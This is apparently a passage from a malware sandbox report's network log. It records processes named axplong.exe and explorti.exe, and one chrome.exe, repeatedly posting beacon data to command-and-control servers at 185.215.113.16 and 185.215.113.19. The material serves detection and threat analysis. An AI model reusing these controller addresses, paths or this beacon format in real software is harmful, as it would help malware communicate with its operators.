Jul 26, 2024 20:10:11.752676964 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:12.012878895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49746	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:12.224679947 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:12.974715948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:13.007620096 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:13.255695105 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49745	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:12.250797987 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:12.963264942 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:12.998121977 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:13.244570971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49749	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:13.925621986 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:14.729487896 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:14.893359900 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:15.153141975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49750	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:14.223618984 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:14.833587885 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:15.054259062 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:15.332835913 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49760	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:15.481784105 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:16.254903078 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:16.262492895 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:16.588604927 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49761	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:15.564229965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:16.330944061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:16.333394051 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:16.642851114 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49768	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:17.794631004 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:18.577061892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:18.587682009 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:18.836123943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49769	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:17.794852018 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:18.587568045 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:18.594198942 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:18.846549988 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49779	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:18.971611023 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:19.780247927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:19.820219040 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:20.081322908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49780	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:19.017656088 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:19.776390076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:19.816724062 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:20.081099987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49788	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:20.207480907 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:20.961946011 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:21.022074938 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:21.269763947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49789	185.215.113.19	80	3920	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:20.207743883 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:20.983273983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:21.077724934 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:21.335055113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49798	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

